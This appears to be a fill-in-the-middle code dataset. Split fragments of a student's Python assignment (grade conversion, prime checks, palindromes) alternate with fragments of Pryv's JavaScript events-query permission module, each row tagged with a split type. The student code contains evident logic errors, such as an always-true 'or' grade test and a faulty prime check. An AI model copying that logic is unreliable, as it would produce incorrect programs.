if letter== 'A' or'A-' or 'A+': #checks to see if it was an A, A+ or A-
if letter == 'A': #assigns the corresponding number value to the letter and prints it
print(str(4))
elif letter == 'A+':
print(str(4+0.3))
elif letter== 'A-':
print(str(4-0.3))
if letter == 'B' or 'B-' or 'B+': #checks to see if it was an B, B+ or B-
if letter == 'B': #assigns the corresponding number value to the letter and prints it
print(str(3.0))
elif letter == 'B+':
print(str(3+0.3))
elif letter == 'B-':
print(str(3-0.3))
if letter == 'C' or 'C-' or 'C+': #checks to see if it was an C, C+ or C-
if letter== 'C': #assigns the corresponding number value to the letter and prints it
print(str(2.0))
elif letter== 'C+':
print(str(2+0.3))
elif letter== 'C-':
print(str(2-0.3))
if letter == 'D' or 'D-' or 'D+': #checks to see if it was an D, D+ or D-
if letter == 'D': #assigns the corresponding number value to the letter and prints it
print(str(1))
elif letter=='D+':
print(str(1+0.3))
elif letter=='D-':
print(str(1-0.3))
if letter == 'F':
print(str(0))
########################
# Question 10
########################
''' creates a function called is_Palindrome that takes one input that is a string
and determines if that string is the exact same when reversed and returns true if it is
and false if it is not '''
def is_Palindrome(string):
reverse = string[::-1] #reverses the string
if reverse == string:
return reverse == string
else:
return reverse == string
########################
# Question 12
########################
''' creates a function called rps that is a game of rock, paper, scissors and takes two input paramteres that are strings
that are either 'S' 'P' 'R' and returns a -1 if player 1 wins and a 1 if player two wins and a zero if its a tie'''
def rps(player1, player2):
if player1 == 'R' and player2 == 'S' or player1 == 'P' and player2 == 'R' or player1 == 'S' and player2 == 'P':
return -1
elif player2 == 'R' and player1 == 'S' or player2 == 'P' and player1 == 'R' or player2 == 'S' and player1 == 'P':
return 1
else:
return 0
########################
# Question 14
########################
''' creates a function called count_even_digits that takes two arguments and returns the amount of even numbers in the first
paramater and the second paramtere is the amount of digits in the first one '''
def count_even_digits(int1, int2):
even = str(int1)
even = int(even.count('0')) + int(even.count('2')) + int(even.count('4')) + int(even.count('6')) + int(even.count('8')) #uses the count operator to see the amount of even numbers
print(str(even))
########################
# Question 13
########################
''' creates a function called alogical that takes one parameter n which must be a integer and counts how many times that integer must be
divided by 2 to be less than or equal to 1 '''
def alogical(n):
counter = 0
while n > 1 or n==1: # while loop is used to count the amount of times needed to divide by 2
n = n/2
counter = counter + 1
print(str(counter))
########################
# Question 11
########################
''' creates a function called is_nneg_float that takes one argument which is a integer and checks to see whether this integer
is a non negetive float and does this by checking if its more than a digit and has a decimal and returns true if it is a
non negative float and returns flalse if it is not '''
def is_nneg_float(s):
if s.count('.')==1 and s.count('e')==0 or len(s)>=1 and s.count('e')==0: #checks to see that it is a float or has atleast more than one digit
if float(s)>0:
return float(s)>0
else:
return float(s)>0
else:
return 0>1
########################
# Question 4
########################
''' creates a function called month_apart that takes 4 arguments and which are integers then checks to see whether these dates
are are atleast a month apart and returns true if they are and false if they are not '''
def month_apart(m1,d1,m2,d2):
if m1==m2: #cannot be a month apart apart if they share the same month
return m1 != m2
if abs(m1-m2)>1: # checks to see if the dates have diffrence of more than 1 month than they are for sure a month apart
return m1>0
if m1>m2: # checks to see whether they are a month apart with respect to the days of each date
return (d1-d2) >= 0
else:
return (d2-d1) >= 0
| letter2number | identifier_name |
a1_300068688.py.py | #Family name: Jared Amos
# Student number: 300068688
# Course: IT1 1120G
# Assignment Number 1
########################
# Question 1
########################
''' creates a function called repeat that takes 3 arguments, the fist argument is a string type and
and the second is a integer value 'n' and the third value is a string called 'delim' this function will
take the string add delim to the end of the string and repeat that 'n' amount times '''
def repeat(string, n, delim):
yoda = (string+delim)*n # creates a string 'yoda' and sets it equal to string+delim and repeats 'n' times
print(str(yoda)) #prints 'yoda'
########################
# Question 2
########################
''' creates a function called is_prime that takes one argument and check to see whether it is prime
or not, if it is a prime the function return true if not it returns else'''
def is_prime(n):
if n >= 2: # prime numbers are numbers that cant be divided unless its by 1 or it self so 'n' cannot be 1 or 2
for i in range(2, n): #creates a for loop that starts at 2 and ends at 'n'
if (n%i == 0): #checks to see whether n divides into i intergerally
return n<0 #if it does return false becuase n is not a prime number then
else:
return n>0 #returns true because n is a prime
########################
# Question 3
########################
''' Creates a function points that takes 4 arguments which make up to coordinates x1,y1 x2,y2
this function then computes the slope of the the line of these points and the distance between them
and outputs a message a message'''
def points(x1,y1,x2,y2):
distance = (((x2-x1)**2)+((y2-y1)**2))**(1/2) # finds the distance between these points by finding the hypotenuse of the triangle a^2 + b^2 = c^2
if (x2-x1)!= 0 and (y2-y1)!=0: #checks to see if the slope is not 0 and if it is print a special message
slope = (y2-y1)/(x2-x1) #computes slope
print("The slope is " + str(slope) + " and the distance is " + str(distance)) #prints out slope and distance
else:
print("the slope is infinity and the distance is " + str(distance))# slope is infinity so it outprints just the distance
########################
# Question 5
########################
''' creates a function reverse_int that takes one argument that is a integer and reverses
this integer'''
def reverse_int(num):
reverse1 = num%10 # gets you the number of the begining of the reversed integer
reverse2 = (num%100)-reverse1 # gets you the number of the second number in the reversed inetger
reverse1 = reverse1*100 # makes the number at the end now the begining
reverse3 = num//100 #gives you last number in the reversed integer
final = reverse1 + reverse2 + reverse3 # adds all the numbers together to get you the reversed int
return final #function returns the reversed int
########################
# Question 6
########################
''' creates a function vowelCount that takes one argument which is a string
and then prints out the number of vowels and what vowels are in the word'''
def vowelCount(string):
print('a, e, i, o, and u appear, respectively, ' + str(string.count('a'))+ ', ' + str(string.count('e'))+ ', ' + str(string.count('i')) + ', ' + str(string.count('o')) + ', ' + str(string.count('u'))+ ' times')
########################
# Question 7
########################
''' creayes a function with 3 input paramteres that are strings and checks to see if all the same
then returns true if they are and false if they are not'''
def allthesame(x,y,z):
if x==y and x==z and z==y: #if statment that checks whther they are all the sale
return x==y
else:
return 1<0
''' creates a function alldifferent that has 3 input paramteres that are all strings
and checks whether all the strings are different and returns true if they are and false
if they are not'''
def alldifferent(x,y,z):
if x != y and y != z and x != z: #checks to see whether the strings x, y and z are all different
return x!=y
else:
return 1<0
''' creates a function called sorted that takes 3 input paramteres and checks to see whether
they are in sorted order and returns true if they are and false if they are not'''
def sorted(x,y,z):
if z>y and z>x and y>x: #checks whther they are sorted
return z>y
else:
return 1<0
########################
# Question 8
########################
''' creates a function called leap that takes on input value that is an integer
, this function then computes whether that number was a leap year and
returns true if it was and false if it isnt'''
def leap(year):
if year%4==0 and year%100 != 0 or year%400==0: #checks whether the year was a leap year
return year>0
else:
return year<0
########################
# Question 9
########################
''' creates a function called letter2number tthat takes a string input that is a letter grade and converts them
to a number grade'''
def letter2number(letter):
if letter== 'A' or'A-' or 'A+': #checks to see if it was an A, A+ or A-
if letter == 'A': #assigns the corresponding number value to the letter and prints it
print(str(4))
| print(str(4+0.3))
elif letter== 'A-':
print(str(4-0.3))
if letter == 'B' or 'B-' or 'B+': #checks to see if it was an B, B+ or B-
if letter == 'B': #assigns the corresponding number value to the letter and prints it
print(str(3.0))
elif letter == 'B+':
print(str(3+0.3))
elif letter == 'B-':
print(str(3-0.3))
if letter == 'C' or 'C-' or 'C+': #checks to see if it was an C, C+ or C-
if letter== 'C': #assigns the corresponding number value to the letter and prints it
print(str(2.0))
elif letter== 'C+':
print(str(2+0.3))
elif letter== 'C-':
print(str(2-0.3))
if letter == 'D' or 'D-' or 'D+': #checks to see if it was an D, D+ or D-
if letter == 'D': #assigns the corresponding number value to the letter and prints it
print(str(1))
elif letter=='D+':
print(str(1+0.3))
elif letter=='D-':
print(str(1-0.3))
if letter == 'F':
print(str(0))
########################
# Question 10
########################
''' creates a function called is_Palindrome that takes one input that is a string
and determines if that string is the exact same when reversed and returns true if it is
and false if it is not '''
def is_Palindrome(string):
reverse = string[::-1] #reverses the string
if reverse == string:
return reverse == string
else:
return reverse == string
########################
# Question 12
########################
''' creates a function called rps that is a game of rock, paper, scissors and takes two input paramteres that are strings
that are either 'S' 'P' 'R' and returns a -1 if player 1 wins and a 1 if player two wins and a zero if its a tie'''
def rps(player1, player2):
if player1 == 'R' and player2 == 'S' or player1 == 'P' and player2 == 'R' or player1 == 'S' and player2 == 'P':
return -1
elif player2 == 'R' and player1 == 'S' or player2 == 'P' and player1 == 'R' or player2 == 'S' and player1 == 'P':
return 1
else:
return 0
########################
# Question 14
########################
''' creates a function called count_even_digits that takes two arguments and returns the amount of even numbers in the first
paramater and the second paramtere is the amount of digits in the first one '''
def count_even_digits(int1, int2):
even = str(int1)
even = int(even.count('0')) + int(even.count('2')) + int(even.count('4')) + int(even.count('6')) + int(even.count('8')) #uses the count operator to see the amount of even numbers
print(str(even))
########################
# Question 13
########################
''' creates a function called alogical that takes one parameter n which must be a integer and counts how many times that integer must be
divided by 2 to be less than or equal to 1 '''
def alogical(n):
counter = 0
while n > 1 or n==1: # while loop is used to count the amount of times needed to divide by 2
n = n/2
counter = counter + 1
print(str(counter))
########################
# Question 11
########################
''' creates a function called is_nneg_float that takes one argument which is a integer and checks to see whether this integer
is a non negetive float and does this by checking if its more than a digit and has a decimal and returns true if it is a
non negative float and returns flalse if it is not '''
def is_nneg_float(s):
if s.count('.')==1 and s.count('e')==0 or len(s)>=1 and s.count('e')==0: #checks to see that it is a float or has atleast more than one digit
if float(s)>0:
return float(s)>0
else:
return float(s)>0
else:
return 0>1
########################
# Question 4
########################
''' creates a function called month_apart that takes 4 arguments and which are integers then checks to see whether these dates
are are atleast a month apart and returns true if they are and false if they are not '''
def month_apart(m1,d1,m2,d2):
if m1==m2: #cannot be a month apart apart if they share the same month
return m1 != m2
if abs(m1-m2)>1: # checks to see if the dates have diffrence of more than 1 month than they are for sure a month apart
return m1>0
if m1>m2: # checks to see whether they are a month apart with respect to the days of each date
return (d1-d2) >= 0
else:
return (d2-d1) >= 0 | elif letter == 'A+':
| random_line_split |
eventsGetUtils.js | /**
* @license
* Copyright (C) 2020-2021 Pryv S.A. https://pryv.com
*
* This file is part of Open-Pryv.io and released under BSD-Clause-3 License
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* 3. Neither the name of the copyright holder nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* SPDX-License-Identifier: BSD-3-Clause
*/
// @flow
/**
* Some method used by events.get are shared with audit.getLogs
*/
const streamsQueryUtils = require('./streamsQueryUtils');
const _ = require('lodash');
const timestamp = require('unix-timestamp');
const errors = require('errors').factory;
const { getMall, StreamsUtils } = require('mall');
const { treeUtils } = require('utils');
const SetFileReadTokenStream = require('../streams/SetFileReadTokenStream');
const SetSingleStreamIdStream = require('../streams/SetSingleStreamIdStream');
const ChangeStreamIdPrefixStream = require('../streams/ChangeStreamIdPrefixStream');
const addTagsStream = require('../streams/AddTagsStream');
import type { Stream } from 'business/src/streams';
import type { StreamQuery, StreamQueryWithStoreId } from 'business/src/events';
import type { MethodContext } from 'business';
import type { ApiCallback } from '../../API';
import type Result from '../../Result';
export type GetEventsParams = {
streams?: Array<string> | string | StreamQuery | Array<StreamQuery>,
arrayOfStreamQueries?: Array<StreamQuery>,
arrayOfStreamQueriesWithStoreId?: Array<StreamQueryWithStoreId>,
tags?: Array<string>,
types?: Array<string>,
fromTime?: number,
toTime?: number,
sortAscending?: boolean,
skip?: number,
limit?: number,
state?: 'default' | 'all' | 'trashed',
modifiedSince?: number,
includeDeletions?: boolean,
};
export type StoreQuery = {
id: string,
storeId: string,
includeTrashed: boolean,
expandChildren: boolean,
excludedIds: Array<string>,
};
let mall;
/**
* # Stream Query Flow
* 1. coerceStreamParam:
* - null `streams` is changed to `[{any: ['*]}]
* - transform "stringified" `streams` by parsing JSON object
*
* 2. transformArrayOfStringsToStreamsQuery:
* For backwardCompatibility with older streams parameter ['A', 'B']
* - `streams: ['A', 'B', 'C']` => `streams: [{any: 'A'}, {any: 'B'}, {any: 'C'}]`
*
* 3. validateStreamsQueriesAndSetStore:
* - Check syntax and add storeId
* `streams: [{any: 'A'}, {any: ':_audit:B'}]` => `streams: [{any: 'A', storeId: 'local'}, {any: 'B', storeId: 'audit'}]`
*
* 4. streamQueryCheckPermissionsAndReplaceStars:
* For `stream.any`ONLY ! (we don't have to check NOT and ALL query as they only reduce scope)
* - check if stream exits and if has "read" access
* - If "stream.any" contains "*" it's replaced by all root streams with "read" rights
*
* 5. streamQueryAddForcedAndForbiddenStreams
* - Add to streams query `all` streams declared as "forced"
* - Add to streams query `not` streams that must not be exposed permissions => with level = "none"
*
* 6. streamQueryExpandStreams
* - Each "streamId" of the queries is "expanded" (i.e. transformed in an array of streamId that includes the streams and it's chidlren)
* - Do not expand streams prefixed with a "#"
*
* - A callBack `expandStreamInContext`is used to link the expand process and the "store"
* This callBack is designed to be optimized on a Per-Store basis The current implementation is generic
* - If streamId is prefixed with a "#" just return the streamId without "#"
* - It queries the stores with and standard `store.streams.get({id: streamId, exludedIds: [....]})`
* and return an array of streams.
*
* - streamsQueryUtils.expandAndTransformStreamQueries
* Is in charge of handling 'any', 'all' and 'not' "expand" process
*
* - "any" is expanded first excluding streamIds in "not"
* => The result is kept in `any`
* - "all" is expanded in second excluding streamIds in "not"
* `all` is tranformed and each "expansion" is kept in `and: [{any: ,..}]`
* example: `{all: ['A', 'B']}` => `{and: [{any: [...expand('A')]}, {any: [...expand('B')]}]}`
* - "not" is expanded in third and added to `and` -- !! we exclude streamIds that are in 'any' as some authorization might have been given on child now expanded
* example: `{all: ['A'], not['B', 'C']}` => `{and: [{any: [...expand('A')]}, {not: [...expand('B')...expand('C')]}]}
*
*/
function coerceStreamsParam(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.streams == null) {
return next();
}
if (! context.acceptStreamsQueryNonStringified) {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else if (isStringOrArrayOfStrings(params.streams)) {
// good, do nothing
} else {
return next(errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query.'))
}
} else {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else {
// good, do nothing
}
}
// Transform object or string to Array
if (!Array.isArray(params.streams)) {
params.streams = [params.streams];
}
next();
function parseStreamsParams(input: string): ?StreamQuery | ?Array<StreamQuery> {
try {
return JSON.parse(input);
} catch (e) {
throw errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query. Error while parsing JSON ' + e, input);
}
}
/**
* we detect if it's JSON by looking at first char.
* Note: since RFC 7159 JSON can also starts with ", true, false or number - this does not apply in this case.
* @param {string} input
*/
function isStringifiedJSON(input: any): boolean {
return (typeof input === 'string') && ['[', '{'].includes(input.substr(0, 1));
}
function isStringOrArrayOfStrings(input: any): boolean {
|
async function applyDefaultsForRetrieval(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
_.defaults(params, {
streams: [{ any: ['*'] }],
tags: null,
types: null,
fromTime: null,
toTime: null,
sortAscending: false,
skip: null,
limit: null,
state: 'default',
modifiedSince: null,
includeDeletions: false
});
if (params.fromTime == null && params.toTime != null) {
params.fromTime = timestamp.add(params.toTime, -24 * 60 * 60);
}
if (params.fromTime != null && params.toTime == null) {
params.toTime = timestamp.now();
}
if (params.fromTime == null && params.toTime == null && params.limit == null) {
// limit to 20 items by default
params.limit = 20;
}
next();
}
function transformArrayOfStringsToStreamsQuery(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
try {
params.arrayOfStreamQueries = streamsQueryUtils.transformArrayOfStringsToStreamsQuery(params.streams);
} catch (e) {
return next(errors.invalidRequestStructure(e, params.streams));
}
next();
}
function validateStreamsQueriesAndSetStore(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
try {
streamsQueryUtils.validateStreamsQueriesAndSetStore(params.arrayOfStreamQueries);
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueries;
} catch (e) {
return next(errors.invalidRequestStructure('Initial filtering: ' + e, params.streams));
}
next();
}
// the two tasks are joined as '*' replaced have their permissions checked
async function streamQueryCheckPermissionsAndReplaceStars(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
context.tracing.startSpan('streamQueries');
const unAuthorizedStreamIds: Array<string> = [];
const unAccessibleStreamIds: Array<string> = [];
async function streamExistsAndCanGetEventsOnStream(streamId: string, storeId: string,
unAuthorizedStreamIds: Array<string>, unAccessibleStreamIds: Array<string>): Promise<void> {
// remove eventual '#' in streamQuery
const cleanStreamId: string = streamId.startsWith('#') ? streamId.substr(1) : streamId;
const stream: Stream = await context.streamForStreamId(cleanStreamId, storeId);
if (stream == null) {
unAccessibleStreamIds.push(cleanStreamId);
return;
}
if (! await context.access.canGetEventsOnStream(cleanStreamId, storeId)) {
unAuthorizedStreamIds.push(cleanStreamId);
}
}
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ "*" case
if (streamQuery.any && streamQuery.any.includes('*')) {
if (await context.access.canGetEventsOnStream('*', streamQuery.storeId)) continue; // We can keep star
// replace any by allowed streams for reading
const canReadStreamIds: Array<string> = [];
for (const streamPermission of context.access.getStoresPermissions(streamQuery.storeId)) {
if (await context.access.canGetEventsOnStream(streamPermission.streamId, streamQuery.storeId)) {
canReadStreamIds.push(streamPermission.streamId);
}
}
streamQuery.any = canReadStreamIds;
} else { // ------------ All other cases
/**
* ! we don't have to check for permissions on 'all' or 'not' as long there is at least one 'any' authorized.
*/
if (streamQuery?.any?.length === 0) {
return next(errors.invalidRequestStructure('streamQueries must have a valid {any: [...]} component'));
}
for (const streamId: string of streamQuery.any) {
await streamExistsAndCanGetEventsOnStream(streamId, streamQuery.storeId, unAuthorizedStreamIds, unAccessibleStreamIds);
};
}
}
if (unAuthorizedStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.forbidden('stream [' + unAuthorizedStreamIds[0] + '] has not sufficent permission to get events'));
}
if (unAccessibleStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.unknownReferencedResource(
'stream' + (unAccessibleStreamIds.length > 1 ? 's' : ''),
'streams',
unAccessibleStreamIds));
}
next();
}
/**
* Add "forced" and "none" events from permissions
*/
function streamQueryAddForcedAndForbiddenStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ ALL --------------- //
// add forced Streams if exists
const forcedStreamIds: Array<string> = context.access.getForcedStreamsGetEventsStreamIds(streamQuery.storeId);
if (forcedStreamIds?.length > 0) {
if (streamQuery.all == null) streamQuery.all = [];
// TODO check for duplicates
streamQuery.all.push(...forcedStreamIds);
}
// ------------- NOT ------------- //
const forbiddenStreamIds: Array<string> = context.access.getForbiddenGetEventsStreamIds(streamQuery.storeId);
if (forbiddenStreamIds?.length > 0) {
if (streamQuery.not == null) streamQuery.not = [];
// TODO check for duplicates
streamQuery.not.push(...forbiddenStreamIds);
}
}
next();
}
async function streamQueryExpandStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
async function expandStreamInContext(streamId: string, storeId: string, excludedIds) {
// remove eventual '#' in streamQuery
if (streamId.startsWith('#')) {
return [streamId.substr(1)]; // do not expand Stream
}
const query: StoreQuery = {
id: streamId,
storeId: storeId,
includeTrashed: params.state === 'all' || params.state === 'trashed',
expandChildren: true,
excludedIds: excludedIds
};
const tree: Array<Stream> = await mall.streams.get(context.user.id, query);
// collect streamIds
const resultWithPrefix: Array<string> = treeUtils.collectPluck(tree, 'id');
// remove storePrefix
const result: Array<string> = resultWithPrefix.map((fullStreamId: string) => StreamsUtils.storeIdAndStreamIdForStreamId(fullStreamId)[1]);
return result;
}
try {
params.arrayOfStreamQueriesWithStoreId = await streamsQueryUtils.expandAndTransformStreamQueries(params.arrayOfStreamQueriesWithStoreId, expandStreamInContext);
} catch (e) {
console.log(e);
context.tracing.finishSpan('streamQueries');
return next(e);
}
// delete streamQueries with no inclusions
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueriesWithStoreId.filter(streamQuery => streamQuery.any != null || streamQuery.and != null);
context.tracing.finishSpan('streamQueries');
next();
}
/**
* - Create a copy of the params per query
* - Add specific stream queries to each of them
*/
async function findEventsFromStore(filesReadTokenSecret: string,
isStreamIdPrefixBackwardCompatibilityActive: boolean, isTagsBackwardCompatibilityActive: boolean,
context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.arrayOfStreamQueriesWithStoreId?.length === 0) {
result.events = [];
return next();
}
// in> params.fromTime = 2 params.streams = [{any: '*' storeId: 'local'}, {any: 'access-gasgsg', storeId: 'audit'}, {any: 'action-events.get', storeId: 'audit'}]
const paramsByStoreId: Map<string, GetEventsParams> = {};
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
const storeId: string = streamQuery.storeId;
if (storeId == null) {
console.error('Missing storeId' + params.arrayOfStreamQueriesWithStoreId);
throw(new Error("Missing storeId" + params.arrayOfStreamQueriesWithStoreId));
}
if (paramsByStoreId[storeId] == null) {
paramsByStoreId[storeId] = _.cloneDeep(params); // copy the parameters
paramsByStoreId[storeId].streams = []; // empty the stream query
}
delete streamQuery.storeId;
paramsByStoreId[storeId].streams.push(streamQuery);
}
// out> paramsByStoreId = { local: {fromTime: 2, streams: [{any: '*}]}, audit: {fromTime: 2, streams: [{any: 'access-gagsg'}, {any: 'action-events.get}]}
/**
* Will be called by "mall" for each source of event that need to be streames to result
* @param {Store} store
* @param {ReadableStream} eventsStream of "Events"
*/
function addnewEventStreamFromSource (store, eventsStream: ReadableStream) {
let stream: ReadableStream = eventsStream;
if (isStreamIdPrefixBackwardCompatibilityActive && !context.disableBackwardCompatibility) {
stream = eventsStream.pipe(new ChangeStreamIdPrefixStream());
}
if (isTagsBackwardCompatibilityActive) {
stream = stream.pipe(new addTagsStream());
}
stream = stream.pipe(new SetSingleStreamIdStream());
if (store.settings?.attachments?.setFileReadToken) {
stream = stream.pipe(new SetFileReadTokenStream({ access: context.access, filesReadTokenSecret }));
}
result.addToConcatArrayStream('events', stream);
}
await mall.events.generateStreams(context.user.id, paramsByStoreId, addnewEventStreamFromSource);
result.closeConcatArrayStream('events');
return next();
}
async function init() {
mall = await getMall();
}
module.exports = {
init,
applyDefaultsForRetrieval,
coerceStreamsParam,
validateStreamsQueriesAndSetStore,
transformArrayOfStringsToStreamsQuery,
streamQueryCheckPermissionsAndReplaceStars,
streamQueryAddForcedAndForbiddenStreams,
streamQueryExpandStreams,
findEventsFromStore,
} | if (typeof input === 'string') return true;
if (! Array.isArray(input)) return false;
for (const item of input) {
if (typeof item !== 'string') return false;
}
return true;
}
}
| identifier_body |
eventsGetUtils.js | /**
* @license
* Copyright (C) 2020-2021 Pryv S.A. https://pryv.com
*
* This file is part of Open-Pryv.io and released under BSD-Clause-3 License
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* 3. Neither the name of the copyright holder nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* SPDX-License-Identifier: BSD-3-Clause
*/
// @flow
/**
* Some method used by events.get are shared with audit.getLogs
*/
const streamsQueryUtils = require('./streamsQueryUtils');
const _ = require('lodash');
const timestamp = require('unix-timestamp');
const errors = require('errors').factory;
const { getMall, StreamsUtils } = require('mall');
const { treeUtils } = require('utils');
const SetFileReadTokenStream = require('../streams/SetFileReadTokenStream');
const SetSingleStreamIdStream = require('../streams/SetSingleStreamIdStream');
const ChangeStreamIdPrefixStream = require('../streams/ChangeStreamIdPrefixStream');
const addTagsStream = require('../streams/AddTagsStream');
import type { Stream } from 'business/src/streams';
import type { StreamQuery, StreamQueryWithStoreId } from 'business/src/events';
import type { MethodContext } from 'business';
import type { ApiCallback } from '../../API';
import type Result from '../../Result';
export type GetEventsParams = {
streams?: Array<string> | string | StreamQuery | Array<StreamQuery>,
arrayOfStreamQueries?: Array<StreamQuery>,
arrayOfStreamQueriesWithStoreId?: Array<StreamQueryWithStoreId>,
tags?: Array<string>,
types?: Array<string>,
fromTime?: number,
toTime?: number,
sortAscending?: boolean,
skip?: number,
limit?: number,
state?: 'default' | 'all' | 'trashed',
modifiedSince?: number,
includeDeletions?: boolean,
};
export type StoreQuery = {
id: string,
storeId: string,
includeTrashed: boolean,
expandChildren: boolean,
excludedIds: Array<string>,
};
let mall;
/**
* # Stream Query Flow
* 1. coerceStreamParam:
* - null `streams` is changed to `[{any: ['*]}]
* - transform "stringified" `streams` by parsing JSON object
*
* 2. transformArrayOfStringsToStreamsQuery:
* For backwardCompatibility with older streams parameter ['A', 'B']
* - `streams: ['A', 'B', 'C']` => `streams: [{any: 'A'}, {any: 'B'}, {any: 'C'}]`
*
* 3. validateStreamsQueriesAndSetStore:
* - Check syntax and add storeId
* `streams: [{any: 'A'}, {any: ':_audit:B'}]` => `streams: [{any: 'A', storeId: 'local'}, {any: 'B', storeId: 'audit'}]`
*
* 4. streamQueryCheckPermissionsAndReplaceStars:
* For `stream.any`ONLY ! (we don't have to check NOT and ALL query as they only reduce scope)
* - check if stream exits and if has "read" access
* - If "stream.any" contains "*" it's replaced by all root streams with "read" rights
*
* 5. streamQueryAddForcedAndForbiddenStreams
* - Add to streams query `all` streams declared as "forced"
* - Add to streams query `not` streams that must not be exposed permissions => with level = "none"
*
* 6. streamQueryExpandStreams
* - Each "streamId" of the queries is "expanded" (i.e. transformed in an array of streamId that includes the streams and it's chidlren)
* - Do not expand streams prefixed with a "#"
*
* - A callBack `expandStreamInContext`is used to link the expand process and the "store"
* This callBack is designed to be optimized on a Per-Store basis The current implementation is generic
* - If streamId is prefixed with a "#" just return the streamId without "#"
* - It queries the stores with and standard `store.streams.get({id: streamId, exludedIds: [....]})`
* and return an array of streams.
*
* - streamsQueryUtils.expandAndTransformStreamQueries
* Is in charge of handling 'any', 'all' and 'not' "expand" process
*
* - "any" is expanded first excluding streamIds in "not"
* => The result is kept in `any`
* - "all" is expanded in second excluding streamIds in "not"
* `all` is tranformed and each "expansion" is kept in `and: [{any: ,..}]`
* example: `{all: ['A', 'B']}` => `{and: [{any: [...expand('A')]}, {any: [...expand('B')]}]}`
* - "not" is expanded in third and added to `and` -- !! we exclude streamIds that are in 'any' as some authorization might have been given on child now expanded
* example: `{all: ['A'], not['B', 'C']}` => `{and: [{any: [...expand('A')]}, {not: [...expand('B')...expand('C')]}]}
*
*/
function coerceStreamsParam(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.streams == null) {
| if (! context.acceptStreamsQueryNonStringified) {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else if (isStringOrArrayOfStrings(params.streams)) {
// good, do nothing
} else {
return next(errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query.'))
}
} else {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else {
// good, do nothing
}
}
// Transform object or string to Array
if (!Array.isArray(params.streams)) {
params.streams = [params.streams];
}
next();
function parseStreamsParams(input: string): ?StreamQuery | ?Array<StreamQuery> {
try {
